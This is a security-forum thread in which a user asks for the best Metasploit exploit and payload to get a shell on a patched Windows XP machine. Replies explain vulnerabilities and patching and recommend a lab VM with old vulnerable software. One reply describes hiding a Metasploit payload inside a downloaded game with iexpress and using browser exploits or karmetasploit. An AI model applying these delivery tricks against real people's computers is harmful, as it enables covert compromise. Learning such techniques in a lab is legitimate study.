If you're attacking the OS directly and it's fully patched (ex: ms08-067) you will have no luck. You will have to look at either attacking installed applications (ftp, smtp, etc) or look into a client side attack.
Best Metasploit exploit/payload for windows XP sp2/3
Hello all,
I just was wondering what the best exploit and payload would be for getting a command shell on a windows XP SP2/SP3 machine. The XP machine would be assumed to be current with updates...
I find it quite a challange as every attempt I have tried returned with no session...
If you're attacking the OS directly and it's fully patched (ex: ms08-067) you will have no luck. You will have to look at either attacking installed applications (ftp, smtp, etc) or look into a client side attack.
If the machine is patched then the "best" exploit would likely be one that doesn't exist yet which leverages a vulnerability which hasn't been identified yet.
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
Ok say I rigged my vm of windows XP so that it has been fully patched but oops I forgot to close port 21 and 80. Could these be "metasploited"?
Well what is running on port 21? you need the name of the service and the version number. Same with port 80. Then you hit google and try to find a vulnerability. So the short answer is no. This stuff takes tons of time, research,pouring over boring code and caffeine.Originally Posted by bfrick50
The easiest way to setup your vm lab with minimal work would be match an exploit in metasploit, and install the vulnerable software to your target machine.
You can find some vulnerable software here: Download old vulnerable softwares version
Also you might want to look at: http://www.offensive-security.com/metasploit-unleashed/
Ok, I'm in a good mood so I'll spoon feed
IT/Security 101.....
An exploit takes advantage of a weakness (also known as a vulnerability), patches correct vulnerabilities.
If a vulnerability exists within the service running/listening on a particular port (21 or 80) then yes it can be exploited. Assuming a) it's a brand new vulnerability that you've discovered (for which there is no patch [yet]) or b) it's an old vulnerability which has not had the corresponding and correcting patch applied.
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
Great,
Thank you all for clearing up the fog in my brain relating to exploits!
The best way to exploit a full patch windows XP.is to Create a payload with metasploit, attached that payload using your friendly microsoft iexpress to a nice little fun game you download of the web. Send and execute on your test VM. When you run the game and close it, the metasploit payload will be executed.
OR!! your can use browser exploits, you can use metasploit to act as a website, and just browse to your machine and hopefully, pop you can command.. if you got wireless check out karmetasploit.
hope this helps.
That helps more than you know. Thank you very much!
Posting Permissions
